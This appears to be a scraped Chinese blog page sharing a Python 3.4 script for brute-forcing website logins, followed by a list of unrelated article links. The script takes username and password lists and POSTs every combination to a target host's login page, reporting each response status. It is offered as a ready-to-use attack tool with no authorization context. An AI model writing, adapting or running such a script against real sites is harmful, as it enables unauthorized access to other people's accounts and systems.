Python3.4 暴力登陆(扫描)网站 工具
来源:互联网 发布:c socket编程教程 编辑:程序博客网 时间:2024/06/05 06:18
简单的写了一个,需求比较急,没有引入多线程等,可以参考
用法:
usage: -u username #单个用户名 -U user list file #用户名列表,一行一个 -p password #单个密码 -P password list #密码列表,一行一个 -h target host #目的服务器地址 -r target port #目的端口 -l login page path,default is /login.html,do not need start with /;#登陆页面地址,默认/例如e.x.:xx.py -U ufile -P pfile -h 2.2.2.2 -r 8080 -l login.php;
代码如下:
#!/usr/bin/python# -*- coding: utf-8 -*-import re;import sys; import os,getopt,sys import urllib.parse #python2.7 版本使用urllib2库,在3.4里面统一到了http.client及urllib里面import http.client, urllib.parseMAX_LINE=1000def open_url(base_url,path,test_data):test_data_urlencode = urllib.parse.urlencode(test_data)headers = {"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}conn = http.client.HTTPConnection(base_url)conn.request("POST", path, test_data_urlencode, headers)response = conn.getresponse()return response.status#getopt命令行参数解析def parse_opt():popts={} try:opts,args = getopt.getopt(sys.argv[1:],"u:p:U:P:h:r:l:")if len(opts) < 5:print("""usage: -u username -U user list file -p password -P password list -h target host ispfile -r target port -l login page path,default is /login.html,do not need start with /; e.x.:xx.py -U ufile -P pfile -h 2.2.2.2 -r 8080 -l /;""")sys.exit(1)for op,value in opts:if op == "-U":popts['isfile'] = Truepopts['user'] =valueelif op == "-u":popts['isfile'] = Falsepopts['user'] = value elif op == "-p": popts['ispfile'] = Falsepopts['pwd'] = valueelif op == "-P": popts['ispfile'] = Truepopts['pwd'] = valueelif op == "-h": popts['host'] = valueelif op == "-r": popts['port'] = valueelif op == "-l": popts['page'] = value except getopt.GetoptError: print("usage: xx.py -u/U -p/P -h -r")return popts#读取文件def readline(filepath): ret=[] filepath=os.getcwd()+"\\"+filepath print(filepath) if filepath==None or filepath=="": print("rule file path cannnot be None.") sys.exit(0) else: if os.path.exists(filepath)==False: print("rule file not found.") sys.exit(0) try: file=open(filepath,'r') for line in file: ret.append(line) except Exception as ex: print(ex) print("open file %s failed." %filepath) finally: file.close() print(len(ret)) return retdef run():popts=parse_opt()if popts['isfile']:users=readline(popts['user'])else:users=[popts['user']]if popts['ispfile']:passwords=readline(popts['pwd'])else:passwords=[popts['pwd']]host='127.0.0.1' path='/login.html?'port='80'if popts['host']!="":host=popts['host']if popts['port']!="":port=popts['port']if popts['page']!="" and popts['page']!="/":path=popts['page']elif popts['page']=="/":path=""if port=='80':ip_port=hostelse:ip_port="%s:%s" %(host,port)for user in users:for password in passwords:data={'username':user.strip(),'password':password.strip()}try:code=open_url(ip_port,path,data)if code==0:print("POST %s failed.exception msg is ret code 0.\r\n" %(path))else:print("POST %s ok.status is %s.\r\n" %(path,code))except Exception as e:print("POST %s failed.exception msg is %s\r\n" %(path,e))continueif __name__ == '__main__':run()
0 0
- Python3.4 暴力登陆(扫描)网站 工具
- Python3.5.2模拟网站登陆
- App 扫描二维码登陆网站
- 网站扫描工具
- 网站漏洞扫描工具
- 网站漏洞扫描工具
- 网站漏洞扫描工具
- 网站漏洞扫描工具
- 网站漏洞扫描工具
- Joomla!网站扫描工具joomscan
- 网站漏洞扫描工具Uniscan
- 预防网站漏洞扫描工具入侵:
- Nikto漏洞扫描工具检测网站安全
- 常用的网站漏洞扫描工具
- 网站漏洞扫描工具 webvulnscan破解版
- 十大Web网站漏洞扫描工具
- 十大Web网站漏洞扫描工具
- wwwscan网站目录文件批量扫描工具
- 小人物传奇存档交换
- GPS的NMEA数据解析
- tp的A模式和B模式 ( Linux输入子系统:多点触控协议)
- C2B微商:试对成本比试错低
- spring事务配置详解
- Python3.4 暴力登陆(扫描)网站 工具
- meteor start up
- OpenCV配置攻略 (Win8 + Opencv 3.0.0 + VS 2013)
- 如何设置 LaunchScreen 显示的时间
- Android Service的生命周期
- 字符串-02. 删除字符串中的子串(20)
- 【开卷有益】JAVA正则表达式模版
- GNSS系统
- 【剑指Offer面试编程题】题目1513:二进制中1的个数--九度OJ